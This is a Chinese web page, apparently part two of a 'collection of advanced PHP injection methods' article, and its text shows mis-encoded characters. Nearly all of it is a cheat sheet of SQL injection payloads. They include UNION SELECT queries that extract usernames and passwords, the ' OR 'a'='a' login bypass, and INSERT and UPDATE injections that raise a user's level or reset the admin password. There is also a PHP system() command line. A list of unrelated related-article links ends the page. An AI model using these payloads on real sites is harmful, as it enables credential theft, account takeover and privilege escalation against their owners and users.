高級(jí)php注入方法集錦第2/2頁(yè)
構(gòu)造語(yǔ)句:
select allowsmilies,public,userid,eventdate,event,subject FROM calendar_events where eventid = 1 union (select 1,1,1,1,1,1,1 from user where userid=1)
select allowsmilies,public,userid,eventdate,event,subject FROM calendar_events where eventid = 1 union (select 1,1,1,1,username,password from user where userid=1)
union%20(select%201,0,2,'1999-01-01','a',password%20FROM%20user%20where%20userid%20=%205)%20order%20by%20eventdate
union%20(select%201,0,12695,'1999-01-01','a',password%20FROM%20user%20where%20userid=13465)%20order%20by%20eventdate
union %20(select%201,0,12695,'1999-01-01','a',userid%20FROM%20user%20where%20username ='sandflee')%20order%20by%20eventdate (查沙子的id)
(select a FROM table_name where a=10 AND B=1 ORDER BY a LIMIT 10)
select * FROM article where articleid='$id' union select * FROM……(字段和數(shù)據(jù)庫(kù)相同情況下,可直接提交)
select * FROM article where articleid='$id' union select 1,1,1,1,1,1,1 FROM……(不同的情況下)
特殊技巧:在表單,搜索引擎等地方寫:
"___"
".__ "
"%
%' ORDER BY articleid/*
%' ORDER BY articleid#
__' ORDER BY articleid/*
__' ORDER BY articleid#
$command = "dir c:\";system($command);
select * FROM article where articleid='$id'
select * FROM article where articleid=$id
1' and 1=2 union select * from user where userid=1/* 句中變?yōu)?nbsp;
(select * FROM article where articleid='1' and 1=2 union select * from user where userid=1/*')
1 and 1=2 union select * from user where userid=1
語(yǔ)句形式:建立一個(gè)庫(kù),插入:
create DATABASE `injection`
create TABLE `user` (
`userid` int(11) NOT NULL auto_increment,
`username` varchar(20) NOT NULL default '',
`password` varchar(20) NOT NULL default '',
PRIMARY KEY (`userid`)
) ;
insert INTO `user` VALUES (1, 'swap', 'mypass');
插如一個(gè)注冊(cè)用戶:
insert INTO `user` (userid, username, password, homepage, userlevel) VALUES ('', '$username', '$password', '$homepage', '1');
"insert INTO membres (login,password,nom,email,userlevel) VALUES ('$login','$pass','$nom','$email','1')";
insert INTO membres (login,password,nom,email,userlevel) VALUES ('','','','','3')#','1')
"insert INTO membres SET login='$login',password='$pass',nom='$nom',email='$email'";
insert INTO membres SET login='',password='',nom='',userlevel='3',email=''
"insert INTO membres VALUES ('$id','$login','$pass','$nom','$email','1')";
update user SET password='$password', homepage='$homepage' where id='$id'
update user SET password='MD5(mypass)' where username='admin'#)', homepage='$homepage' where id='$id'
"update membres SET password='$pass',nom='$nom',email='$email' where id='$id'";
update membres SET password='[PASS]',nom='',userlevel='3',email=' ' where id='[ID]'
"update news SET Votes=Votes+1, score=score+$note where idnews='$id'";
長(zhǎng)用函數(shù):
DATABASE()
USER()
SYSTEM_USER()
SESSION_USER()
CURRENT_USER()
比如:
update article SET title=$title where articleid=1 對(duì)應(yīng)函數(shù)
update article SET title=DATABASE() where id=1
#把當(dāng)前數(shù)據(jù)庫(kù)名更新到title字段
update article SET title=USER() where id=1
#把當(dāng)前 mysql 用戶名更新到title字段
update article SET title=SYSTEM_USER() where id=1
#把當(dāng)前 MySQL 用戶名更新到title字段
update article SET title=SESSION_USER() where id=1
#把當(dāng)前 MySQL 用戶名更新到title字段
update article SET title=CURRENT_USER() where id=1
#把當(dāng)前會(huì)話被驗(yàn)證匹配的用戶名更新到title字段
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
$req = "select * FROM membres where name like '%$search%' ORDER BY name";
select * FROM membres where name like '%%' ORDER BY uid#%' ORDER BY name
select * FROM membres where name like '%%' ORDER BY uid#%' ORDER BY name
select uid FROM admins where login='' OR 'a'='a' AND password='' OR 'a'='a' (經(jīng)典)
select uid FROM admins where login='' OR admin_level=1#' AND password=''
select * FROM table where msg like '%hop'
select uid FROM membres where login='Bob' AND password like 'a%'#' AND password=''
select * FROM membres where name like '%%' ORDER BY uid#%' ORDER BY name
相關(guān)文章
php使用PDO事務(wù)配合表格讀取大量數(shù)據(jù)插入操作實(shí)現(xiàn)方法
這篇文章主要介紹了php使用PDO事務(wù)配合表格讀取大量數(shù)據(jù)插入操作實(shí)現(xiàn)方法,涉及php使用excel_reader操作Excel文件及PDO操作數(shù)據(jù)庫(kù)的相關(guān)技巧,需要的朋友可以參考下2017-02-02php實(shí)現(xiàn)的網(wǎng)頁(yè)版剪刀石頭布游戲示例
這篇文章主要介紹了php實(shí)現(xiàn)的網(wǎng)頁(yè)版剪刀石頭布游戲,涉及php數(shù)組遍歷、比較及隨機(jī)數(shù)組調(diào)用相關(guān)操作技巧,需要的朋友可以參考下2016-11-11PHP操作SQL Server數(shù)據(jù)庫(kù)實(shí)現(xiàn)表的改查與統(tǒng)計(jì)
這篇文章主要介紹了如何利用PHP對(duì)MS SQL Server數(shù)據(jù)表的查詢、統(tǒng)計(jì)與修改,文中的示例代碼講解詳細(xì),感興趣的小伙伴可以跟隨小編一起學(xué)習(xí)一下2022-03-03php封裝的數(shù)據(jù)庫(kù)函數(shù)與用法示例【參考thinkPHP】
這篇文章主要介紹了php封裝的數(shù)據(jù)庫(kù)函數(shù)與用法,基于thinkPHP中數(shù)據(jù)庫(kù)操作相關(guān)代碼整理簡(jiǎn)化而來,包括針對(duì)數(shù)據(jù)庫(kù)的設(shè)置、連接、查詢及日志操作等功能,簡(jiǎn)單實(shí)用,需要的朋友可以參考下2016-11-11WordPress中用于獲取搜索表單的PHP函數(shù)使用解析
這篇文章主要介紹了WordPress中用于獲取搜索表單的PHP函數(shù)使用解析,即get_search_form函數(shù)的基本用法,需要的朋友可以參考下2016-01-01本地機(jī)apache配置基于域名的虛擬主機(jī)詳解
以下是對(duì)本地機(jī)apache配置基于域名的虛擬主機(jī)進(jìn)行了詳細(xì)的介紹,需要的朋友可以過來參考下2013-08-08PHP使用兩個(gè)棧實(shí)現(xiàn)隊(duì)列功能的方法
這篇文章主要介紹了PHP使用兩個(gè)棧實(shí)現(xiàn)隊(duì)列功能的方法,結(jié)合實(shí)例形式分析了php基于兩個(gè)棧實(shí)現(xiàn)隊(duì)列功能的思路與具體操作技巧,需要的朋友可以參考下2018-01-01php實(shí)現(xiàn)的遞歸提成方案實(shí)例
這篇文章主要介紹了php實(shí)現(xiàn)的遞歸提成方案,以完整實(shí)例形式較為詳細(xì)的分析了php提成方案的數(shù)據(jù)庫(kù)設(shè)計(jì)及功能實(shí)現(xiàn)技巧,涉及PHP數(shù)學(xué)運(yùn)算的相關(guān)技巧,需要的朋友可以參考下2015-11-11Windows下安裝PHP單元測(cè)試環(huán)境PHPUnit圖文教程
這篇文章主要介紹了Windows下安裝PHP單元測(cè)試環(huán)境PHPUnit圖文教程,按照本文操作即可在Windows下安裝成功PHPUnit,需要的朋友可以參考下2014-10-10